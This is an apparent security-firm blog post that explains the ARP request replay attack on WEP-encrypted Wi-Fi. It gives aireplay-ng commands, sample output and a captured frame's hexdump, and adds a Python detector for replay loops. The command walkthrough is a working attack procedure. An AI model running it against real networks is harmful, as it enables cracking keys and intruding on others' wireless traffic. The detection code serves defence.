Airzero Sec


How Do ARP Request Replay Attacks Work?

Posted in Website Security by Johnson Augustine

The classic ARP request replay attack is the most effective way to generate new initialization vectors (IVs), and it works very reliably. The program listens for an ARP packet and then retransmits it back to the access point. This, in turn, causes the access point to repeat the ARP packet with a new IV each time. The program keeps retransmitting the same ARP packet over and over, but every packet repeated by the access point carries a fresh IV. It is all these new initialization vectors that let you determine the WEP key.

What is ARP?

ARP is the Address Resolution Protocol: a TCP/IP protocol used to map an IP address to a physical (hardware) address, such as an Ethernet address. A host wishing to obtain a physical address broadcasts an ARP request onto the TCP/IP network. The host on the network that has the IP address in the request then replies with its physical hardware address.

What is the usage of ARP?

The basic usage is:

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

Where:

  • -3 means classic ARP request replay
  • -b 00:13:10:30:24:9C is the access point MAC address
  • -h 00:11:22:33:44:55 is the source MAC address
  • ath0 is the wireless interface name

The next usage is:

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 -r replay_arp-0219-115508.cap ath0

Where:

  • -3 means classic ARP request replay
  • -b 00:13:10:30:24:9C is the access point MAC address
  • -h 00:11:22:33:44:55 is the source MAC address
  • -r replay_arp-0219-115508.cap is the name of the file from your last successful ARP replay
  • ath0 is the wireless interface

The next usage is:

aireplay-ng -2 -r replay_arp-0219-115508.cap ath0

Where:

  • -2 means interactive frame selection
  • -r replay_arp-0219-115508.cap is the name of the file from your last successful ARP replay

What are the examples of the usage?

For all of the examples given here, use airmon-ng to put your card into monitor mode first. You cannot inject packets unless the card is in monitor mode.

For this type of attack, you need either the MAC address of an associated client or a fake MAC address established by an earlier attack. The simplest and fastest way is to use the MAC address of an associated client, which can be obtained with airodump-ng. The reason for using an associated MAC address is that the access point will only accept and repeat packets whose sending MAC is "associated".

You may need to wait a couple of seconds, or even longer, until an ARP request shows up. This type of attack will fail if there is no traffic.

Enter the following command:

aireplay-ng -3 -b 00:14:6c:7e:40:80 -h 00:0F:B5:88:AC:82 ath0

The system responds:

Saving ARP requests in replay_arp-0219-123051.cap

You should also start airodump-ng to capture replies.

Read 11978 packets (got 7193 ARP requests), sent 3902 packets...

Initially the last line will look like this: Read 39 packets, sent 0 packets...

Then, once the attack is in progress, the zeroes change to the actual counts, as in the full sample given above. You can also confirm this by running airodump-ng to capture the IVs being generated. It should show the data count increasing rapidly for the specific access point.

The second example reuses the ARP captured in the example above. Notice that the output said the ARP requests were being saved in "replay_arp-0219-123051.cap". So rather than waiting for a new ARP, we simply reuse the old ones with the "-r" parameter:

aireplay-ng -2 -r replay_arp-0219-123051.cap ath0

The system responds:

Size: 86, FromDS: 0, ToDS: 1 (WEP)
BSSID  =  00:14:6C:7E:40:80
Dest. MAC  =  FF:FF:FF:FF:FF:FF
Source MAC  =  00:0F:B5:88:AC:82
0x0000:  0841 0000 0014 6c7e 4080 000f b588 ac82  .A....l~@.......
0x0010:  ffff ffff ffff 7092 e627 0000 7238 937c  ......p..'..r8.|
0x0020:  8011 36c6 2b2c a79b 08f8 0c7e f436 14f7  ..6.+,.....~.6..
0x0030:  8078 a08e 207c 17c6 43e3 fe8f 1a46 4981  .x.. |..C....FI.
0x0040:  947c 1930 742a c85f 2699 dabe 1368 df39  .|.0t*._&....h.9
0x0050:  ca97 0d9e 4731                           ....G1
Use this packet ? y

You answer "y" and the tool starts injecting:

Saving chosen packet in replay_src-0219-123117.cap

You should also start airodump-ng to capture replies.

Sent 3181 packets...

Alternatively, you can reuse the capture with the -3 form shown in the usage section above:

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 -r replay_arp-0219-115508.cap ath0

At this point, if you have not already done so, start airodump-ng to capture the IVs being generated. The data count should be increasing continuously.

When you are testing this at home, to create an ARP packet to seed the ARP injection, simply ping a non-existent IP on the network.
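From the defender's side, the replay loop described above has a recognisable signature: one station sends the same WEP ciphertext, under the same IV, over and over, and the access point answers with rebroadcasts that carry fresh IVs. The following Python is an added example (not part of the original post or of the aircrack-ng suite): it decodes the 802.11 header and WEP IV of the frame that aireplay-ng printed above, and flags any frame that repeats more than a threshold number of times. The threshold of 10 and the ad-hoc handling of four-address frames are assumptions.

```python
import struct
from collections import Counter

# Constructed sample: the 86-byte WEP-protected ARP request that aireplay-ng
# printed in the walkthrough above, re-typed from its hexdump.
SAMPLE_FRAME = bytes.fromhex(
    "0841 0000 0014 6c7e 4080 000f b588 ac82"
    "ffff ffff ffff 7092 e627 0000 7238 937c"
    "8011 36c6 2b2c a79b 08f8 0c7e f436 14f7"
    "8078 a08e 207c 17c6 43e3 fe8f 1a46 4981"
    "947c 1930 742a c85f 2699 dabe 1368 df39"
    "ca97 0d9e 4731"
)

def mac(b: bytes) -> str:
    return ":".join(f"{x:02X}" for x in b)

def parse_wep_frame(raw: bytes) -> dict:
    """Decode the 802.11 header and the WEP IV of a data frame (no decryption)."""
    fc = struct.unpack_from("<H", raw, 0)[0]
    flags = fc >> 8                          # second frame-control byte
    to_ds, from_ds = flags & 0x01, (flags >> 1) & 0x01
    retry, protected = bool(flags & 0x08), bool(flags & 0x40)
    a1, a2, a3 = raw[4:10], raw[10:16], raw[16:22]
    if to_ds and not from_ds:                # station -> AP: addr1 is the BSSID
        bssid, src, dst = a1, a2, a3
    elif from_ds and not to_ds:              # AP -> station: addr2 is the BSSID
        dst, bssid, src = a1, a2, a3
    else:                                    # ad-hoc (assumption: WDS treated the same)
        dst, src, bssid = a1, a2, a3
    seq = struct.unpack_from("<H", raw, 22)[0] >> 4
    iv = raw[24:27].hex() if protected else None   # 3-byte IV precedes the ciphertext
    return {"size": len(raw), "to_ds": to_ds, "from_ds": from_ds, "wep": protected,
            "retry": retry, "bssid": mac(bssid), "src": mac(src), "dst": mac(dst),
            "seq": seq, "iv": iv}

def find_replayed_frames(frames, threshold=10):
    """Flag WEP frames whose (bssid, src, iv, size) repeats more than `threshold`
    times.  Apart from a MAC-layer retry (skipped here), a station does not resend
    the same ciphertext under the same IV; dozens of copies are the replay loop."""
    seen = Counter()
    for f in map(parse_wep_frame, frames):
        if f["wep"] and not f["retry"]:
            seen[(f["bssid"], f["src"], f["iv"], f["size"])] += 1
    return {key: n for key, n in seen.items() if n > threshold}

if __name__ == "__main__":
    print(parse_wep_frame(SAMPLE_FRAME))
    print(find_replayed_frames([SAMPLE_FRAME] * 25))
```

On a live capture you would feed the raw frames from a monitor-mode interface into find_replayed_frames and alert on any key it returns; the sample frame parses to BSSID 00:14:6C:7E:40:80, source 00:0F:B5:88:AC:82, broadcast destination, ToDS=1 and IV e62700, matching the aireplay-ng output above.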

If you have any doubts about this topic, or would like advice and consultation about ARP request replay attacks, feel free to contact us. AIRZERO SEC will be your strong digital solution. Email id: [email protected]

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/